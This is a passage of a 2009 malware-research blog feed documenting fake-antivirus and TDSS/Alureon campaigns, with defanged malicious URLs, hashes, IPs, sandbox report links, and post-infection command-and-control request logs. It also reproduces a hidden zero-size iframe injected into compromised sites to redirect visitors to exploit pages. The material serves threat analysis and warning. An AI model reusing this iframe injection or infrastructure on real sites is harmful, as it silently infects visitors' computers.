Request: POST /borders.php &lt;/textarea&gt;&lt;br /&gt;&lt;p&gt;---------------------------------------------------- &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;hxxp://venerapictures.com/item/6000dc4d413ac4f08d&lt;br /&gt;  c431fdc85ccde9d80ff0a04b824084feb9c840903939083e0&lt;br /&gt;  c4f78441277ced/b0b/item.gif &lt;br /&gt;  &lt;/span&gt; &lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/c643225fd027afeabff3baec75f21e8e" target="_blank"&gt;VirusTotal&lt;/a&gt; - 7/40 (17.5%)&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e3ed412e325a0ff4c963af2a626838df" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;File size: 145412 bytes&lt;br /&gt;MD5...: d2b451fee4f7c42b06121cf03f8ea281&lt;br /&gt;&lt;br /&gt;---------------------------------------------------- &lt;br /&gt;&lt;span class="scam_website"&gt;hxxp://venerapictures.com/werber/900/216.jpg&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/2f9385b2d31e24fbd2b8337303a02f8f" target="_blank"&gt;VirusTotal&lt;/a&gt; - 8/40 (20%)&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=17ce261f3dabfa6a4a9e179c280a453e7" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;File size: 99332 bytes &lt;br /&gt;MD5...: 5bc8a73f3412c574909e5f3c193fed89 &lt;br /&gt;&lt;br /&gt;---------------------------------------------------- &lt;br /&gt;&lt;span class="scam_website"&gt;hxxp://files.get-fails-load-av.com/exe/setup_200002.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/1d973e01b69d2df97f03c7ca1e27e686" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;span id="porcentaje"&gt;9/40 (22.5%)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=104332b7aecf7fc942900f07c2e72a297" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;File size: 78347 bytes&lt;br /&gt;MD5...: ff220534519a1a116dbc2dd712bff24a &lt;br /&gt;&lt;br /&gt;HTTP Activity: &lt;br /&gt;&lt;br /&gt;&lt;textarea name="textarea" cols="45" rows="4"&gt;
195.88.81.116 [dl.scan-anti-spy-4free.com]
195.88.80.207 [int.reporting32.com]
&lt;/textarea&gt;&lt;br /&gt;
  ---------------------------------------------------- &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;hxxp://lwl-softwares.com/939.exe &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/134aceb45f081d0de75823c042925bd6" target="_blank"&gt;VirusTotal&lt;/a&gt; - 0/39 (0%)&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1ef8a5604aabc7dc49d6fa8cba2f96ae8" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;File size: 180224 bytes &lt;br /&gt;MD5...: 1ff562c02c68f0a8001135dc89b4eaa1 &lt;br /&gt;&lt;br /&gt;HTTP Activity: &lt;br /&gt;&lt;br /&gt;&lt;textarea name="textarea2" cols="45" rows="16"&gt;
78.47.186.162 [hitmidpoint.com]
Request: GET /?accs=939&amp;amp;
tid=100

84.243.252.87 [staritquick.com] 
Request: GET /in.cgi?9&amp;amp;
gai=cspsa3p&amp;amp;gli=273&amp;amp;
gff=cs_221227254&amp;amp;al=

89.248.168.46 [toppromooffer.com]
Request: GET /srm/adv/142/?a=
cspsa3p&amp;amp;l=273&amp;amp;f=
cs_221227254&amp;amp;ex=&amp;amp;
ed=&amp;amp;sub=csp&amp;amp;prodabbr=USRM &lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;----------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;hxxp://lwl-softwares.com/important.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=176525f12bcb68e0495d6997859873e21" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;File size: 135168 byte&lt;br /&gt;MD5...: 83b4560333601224cb0d5709bdf57191 &lt;br /&gt;&lt;br /&gt;Trojan.Win32.Tibs&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5261609962080268700?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5261609962080268700'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5261609962080268700'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p9.html' title='Black Hat SEO and Rogue Antivirus p.9'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHqRdm5YDI/AAAAAAAAAa4/R1Inb8MWasU/s72-c/malicious-website.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-6745882742767438849</id><published>2009-04-20T16:18:00.000-07:00</published><updated>2009-04-20T16:20:02.767-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='fake av'/><category scheme='http://www.blogger.com/atom/ns#' term='dnschanger'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkit TDSS'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='rbn'/><category scheme='http://www.blogger.com/atom/ns#' term='javascript exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Alureon'/><title type='text'>Black Hat SEO and Rogue Antivirus p.8</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO and Rogue Antivirus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="510" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="510"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt; A quick move to this IP block 209.44.126.0/24 by &amp;quot;Netelligent Hosting Services Inc&amp;quot; which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon.&lt;br /&gt;&lt;br /&gt;All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network  (screenshot below)&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;Check it out - &lt;em&gt;maybe someone have access to your PC right now&lt;/em&gt;! Protect   yourself.&lt;br /&gt;&lt;br /&gt;Also Google show &lt;a href="http://www.google.com/search?q=%22maybe+someone+have+access+to+your+PC+right+now!%22" target="_blank"&gt;14,800 result&lt;/a&gt; for this phrase.&lt;br /&gt;&lt;br /&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 69px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sev0LRaDTVI/AAAAAAAAAYw/_arUL0B8HtU/s320/basevirusscan.com-fake-ad.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326619458784152914" /&gt; &lt;br /&gt;&lt;br /&gt;Detection:&lt;br /&gt;&lt;br /&gt;Trojan TDSS&lt;br /&gt;Trojan DNSChanger&lt;br /&gt;Trojan Kryptik&lt;br /&gt;Trojan FakeSpyGuard&lt;br /&gt;Trojan InternetAntivirusPro&lt;br /&gt;&lt;br /&gt;Sites serving  for the fake antivirus campaign:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;209.44.126.14&lt;/b&gt;&lt;p&gt;activesecurityshield.com &lt;br /&gt;anytoplikedsite.com &lt;br /&gt;basevirusscan.com  &lt;br /&gt;bestfiresfull.com &lt;br /&gt;bestsecurityupdate.com &lt;br /&gt;checkonlinesecurity.com&lt;br /&gt;cleanyourpcspace.com &lt;br /&gt;destroyvirusnow.com &lt;br /&gt;fastsecurityscan.com &lt;br /&gt;fastviruscleaner.com &lt;br /&gt;firstscansecurity.com &lt;br /&gt;fuc*moneycash.com &lt;br /&gt;fullandtotalsecurity.com &lt;br /&gt;fullsecurityshield.com &lt;br /&gt;getpcguard.com &lt;br /&gt;getscanonline.com &lt;br /&gt;getsecuritywall.com &lt;br /&gt;greatsecurityshield.com &lt;br /&gt;inetsecuritycenter.com &lt;br /&gt;initialsecurityscan.com &lt;br /&gt;mostpopularscan.com &lt;br /&gt;myfirstsecurityscan.com &lt;br /&gt;mytoplikedsite.com&lt;br /&gt;mytopvirusscan.com &lt;br /&gt;onlinescandetect.com &lt;br /&gt;onlinescanservice.com &lt;br /&gt;popularpcscan.com &lt;br /&gt;runpcscannow.com &lt;br /&gt;scanalertspage.com &lt;br /&gt;scanbaseonline.com &lt;br /&gt;scanprotectiononline.com&lt;br /&gt;scanvistanow.net &lt;br /&gt;securityscan4you.com &lt;br /&gt;securitytopagent.com&lt;br /&gt;thegreatsecurity.com &lt;br /&gt;todaybestscan.com&lt;br /&gt;topsecurity4you.com &lt;br /&gt;topsecurityapp.com &lt;br /&gt;topsoftscanner.com &lt;br /&gt;totalpcdefender.com&lt;br /&gt;totalvirusdestroyer.com &lt;br /&gt;truescansecurity.com &lt;br /&gt;trustsecurityshield.com &lt;br /&gt;upyoursecurity.com &lt;br /&gt;virustopshield.com&lt;br /&gt;vistastabilitynow.com &lt;br /&gt;vistastabilitynow.net &lt;br /&gt;websecuritymaster.com &lt;br /&gt;websecurityvoice.com &lt;br /&gt;yourstabilitysystem.com &lt;br /&gt;&lt;br /&gt;&lt;b&gt;209.44.126.16&lt;/b&gt;&lt;br /&gt;systemsecurityonline.com&lt;br /&gt;systemsecuritytool.com&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;209.44.126.29&lt;/b&gt;&lt;br /&gt;individualpeople.biz (will be analyzed below)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;209.44.126.14&lt;br /&gt;209.44.126.15&lt;br /&gt;209.44.126.16&lt;br /&gt;209.44.126.17&lt;br /&gt;209.44.126.22&lt;br /&gt;209.44.126.23&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;NS for rogue fake av websites  &lt;br /&gt;&lt;br /&gt;&lt;b&gt;209.44.126.32&lt;/b&gt;&lt;br /&gt;asmmnation.com&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=3857827a43ea245009dd7d4bcd89f931" target="_blank"&gt;ThreatExpert report&lt;/a&gt;&lt;br /&gt;In conjunction with an IP in ukraine : &lt;a href="www.symantec.com/security_response/writeup.jsp?docid=2009-041208-1533-99&amp;amp;tabid=2" target="_blank"&gt;Symantec write up&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;hr /&gt;&lt;p&gt;&lt;br /&gt;On this IP &lt;b&gt;209.44.126.29&lt;/b&gt; we also have a couple of page with exploits which leads to the trojan TDSS (Alureon).&lt;br /&gt;&lt;br /&gt;I will take this domain for example &amp;quot;individualpeople[.]biz&amp;quot;&lt;br /&gt;&lt;/p&gt;  Malicious script (IFRAME) inserted.  &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&amp;amp;t=1240077587&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;table width="383" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;    &lt;td width="379" height="61" style="padding:15px"&gt;&amp;lt;iframe src=&amp;quot;hxxp://individualpeople.biz/go.php?sid=1&amp;quot; width=&amp;quot;0&amp;quot; height=&amp;quot;0&amp;quot; frameborder=&amp;quot;0&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;  &lt;p&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank"&gt;&lt;/a&gt;Redirects to the page below which host several exploits. &lt;a href="http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&amp;amp;t=1240196375&amp;amp;type=js" target="_blank"&gt;Javascript Analysis&lt;/a&gt; (Wepawet)&lt;br /&gt;&lt;/p&gt;&lt;table width="372" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;    &lt;td width="368" height="61" style="padding:15px"&gt;hxxp://individualpeople.biz/go.php?sid=6&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;  &lt;br /&gt;  &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af8bd022f9e66431efbb45a537c02e" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;table width="372" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;  &lt;td width="368" height="61" style="padding:15px"&gt;hxxp://209.44.126.30/unsecurity/pdf.php&lt;/td&gt;  &lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=929b20cc7a4033457630858487bbfc7e&amp;amp;t=1240078681"&gt;Wepawet Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/763688a5e2cd02d43d6de933354f63be" target="_blank"&gt;VirusTotal&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;to finally load this page &lt;br /&gt;&lt;br /&gt;&lt;table width="339" height="48" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="335" height="46" style="padding:15px"&gt;hxxp://209.44.126.30/unsecurity/load.php&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/4ea0b7a64405a26f6c50f91fb6792c17" target="_blank"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1aab3383fb44f06d419479c2396b7b47f" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Detections:&lt;br /&gt;&lt;br /&gt;W32/Alureon.B!Generic&lt;br /&gt;Win32.Rootkit.TDSS.eyj.4&lt;br /&gt;Packed.Win32.Tdss.f&lt;br /&gt;Trojan.Win32.FakeSpyguard&lt;br /&gt;Trojan:Win32/Alureon.gen!J&lt;br /&gt;Trojan/Fakealert.gen &lt;br /&gt;&lt;br /&gt;--------------------------------------&lt;br /&gt;&lt;br /&gt;HTTP activity after infection&lt;br /&gt;&lt;br /&gt;92.48.91.145:80 - [trafficstatic.net] &lt;br /&gt;&lt;br /&gt;Request: GET /banner/crcmds/main &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/init &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/uacsrcr.dat &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/update &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crfiles/uacd &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crfiles/uacc &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crfiles/uaclog &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crfiles/uacmask &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crfiles/uacserf &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/types/standart &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/types/standart &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/types/standart &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/affids/11 &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/affids/11 &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/affids/11 &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/subids/v3072 &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/subids/v3072 &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/subids/v3072 &lt;br /&gt;Response: 404 &amp;quot;Not Found&amp;quot; &lt;br /&gt;Request: GET /banner/crcmds/builds/bbr &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /banner/crfiles/uacbbr &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;&lt;br /&gt;72.233.114.126:80 - [statsanalist.cn] &lt;br /&gt;&lt;br /&gt;Request: GET /?gd=KCo7MD8uPS4iPA==&amp;amp;affid=Xl4=&amp;amp;subid=GVxfWF0=&amp;amp;prov=Xw==&amp;amp;mode=cr&amp;amp;v=5 &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;Request: GET /?gd=ICQwJiE8Oy4jIw==&amp;amp;affid=Xl4=&amp;amp;subid=GVxfWF0=&amp;amp;prov=Xl9fXl8=&amp;amp;mode=cr&amp;amp;v=5 &lt;br /&gt;Response: 200 &amp;quot;OK&amp;quot; &lt;br /&gt;&lt;br /&gt;&lt;hr  /&gt; IPs implicated:&lt;br /&gt;&lt;br /&gt;209.44.126.14&lt;br /&gt;209.44.126.15&lt;br /&gt;209.44.126.16&lt;br /&gt;209.44.126.17&lt;br /&gt;209.44.126.22&lt;br /&gt;209.44.126.23&lt;br /&gt;209.44.126.29&lt;br /&gt;209.44.126.32 &lt;br /&gt;&lt;br /&gt;Other domain in conjunction can be found using ThreatExpert&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/reports.aspx?find=banner%2Fcrcmds%2Fmain" target="_blank"&gt;/banner/crcmds/main&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=aa0358f54817c3f8c143ade90f228c5b" target="_blank"&gt;Report 1&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=1d3b847cc5a235142acd32d1deba6aff" target="_blank"&gt;Report 2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;92.48.91.144&lt;br /&gt;trafficstatic.com&lt;br /&gt;explorerex.com&lt;br /&gt;windowslogonex.com&lt;/p&gt;&lt;p&gt;92.48.91.145&lt;br /&gt;trafficstatic.net&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=100b5b3f6cfef4c9290a3a7cbd5a58a4" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;/p&gt;&lt;p&gt;95.211.14.159&lt;br /&gt;golddiggero1.com&lt;/p&gt;&lt;p&gt;76.76.103.162&lt;br /&gt;webieupdate.net&lt;/p&gt;&lt;p&gt;94.76.208.32&lt;br /&gt;symupdate2.com&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;/p&gt;&lt;p&gt;72.233.114.125&lt;br /&gt;webnicrisoft.net&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;/p&gt;&lt;p&gt;64.213.140.254&lt;br /&gt;webmsupdate.net&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-6745882742767438849?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/6745882742767438849'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/6745882742767438849'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p8.html' title='Black Hat SEO and Rogue Antivirus p.8'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_9YOi_bjoDL4/Sev0LRaDTVI/AAAAAAAAAYw/_arUL0B8HtU/s72-c/basevirusscan.com-fake-ad.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-3244632093602359334</id><published>2009-04-20T02:05:00.000-07:00</published><updated>2009-04-20T16:07:51.240-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='Eurohost LLC'/><category scheme='http://www.blogger.com/atom/ns#' term='rbn'/><category scheme='http://www.blogger.com/atom/ns#' term='pdf malware'/><category scheme='http://www.blogger.com/atom/ns#' term='javascript exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe trojans'/><title type='text'>Black Hat SEO - RBN Hacks, p.4</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="502" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO, exploits, hacks, botnets&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; Crimeware toolkits in the wild&lt;br /&gt;&lt;/p&gt;&lt;table width="488" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="488"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;WARNING&lt;/b&gt;: All sites listed on this page are dangerous (live URL with exploits) &lt;br /&gt; which lead  to trojans beeing automatically installed on your computer.&lt;br /&gt;Do NOT visit them unless you know what you are doing. &lt;br /&gt;(only links are safe)&lt;br /&gt;&lt;p&gt;Another very good example on the site below which lead to other domain in the network previously cited &amp;quot;Eurohost LLC   &amp;quot; shows that this attack seems to be everywhere.&lt;br /&gt;&lt;br /&gt;IFrames injected, pdf malware + viruses. Attached some screenshots.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;Infected page:&lt;br /&gt;&lt;br /&gt;&lt;table width="400" height="28" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="26" style="padding:10px"&gt;hxxp://team-sleep.by.ru/default2.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=604bd9c2390b9bad17a7d36a01a31421&amp;amp;t=1240189015&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="28" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="26" style="padding:10px"&gt;hxxp://8addition.info/t/?75724cae9d &lt;br /&gt;hxxp://sexbases.cn/in.cgi?16&amp;amp;161b72&lt;br /&gt;hxxp://utevox.site90.com/f/index.php&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EVczvmI/AAAAAAAAAY4/DGUFqQzpfe0/s1600-h/default2.html.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 167px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sew7EVczvmI/AAAAAAAAAY4/DGUFqQzpfe0/s320/default2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697404935945826" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;************&lt;br /&gt;Infected page:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="28" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="26" style="padding:10px"&gt;hxxp://team-sleep.by.ru/demo.html&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=15d95656782ca0e0a1318bba5b3d5db0&amp;amp;t=1240189151&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;    Requests:  &lt;br /&gt;&lt;/p&gt;&lt;table width="400" height="28" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="362" height="26" style="padding:10px"&gt;hxxp://bizoplata.ru/pay.html?&lt;br /&gt;hxxp://bizoplata.ru/ballast.html&lt;br /&gt;hxxp://tixwagoq.cn/in.cgi?4&lt;br /&gt;hxxp://paylayos.cn/nuc/index.php&lt;br /&gt;hxxp://bizoplata.ru/post.html&lt;br /&gt;hxxp://sunmaiamibich.ru/pupu/in.php&lt;br /&gt;hxxp://5rublei.com/unique/index.php&lt;br /&gt;hxxp://tochtonenado.com/yes/index.php &lt;br /&gt;hxxp://mixbunch.cn/thread.html&lt;br /&gt;hxxp://mixbunch.cn/golf.html&lt;br /&gt;hxxp://mixbunch.cn/bowling.html&lt;br 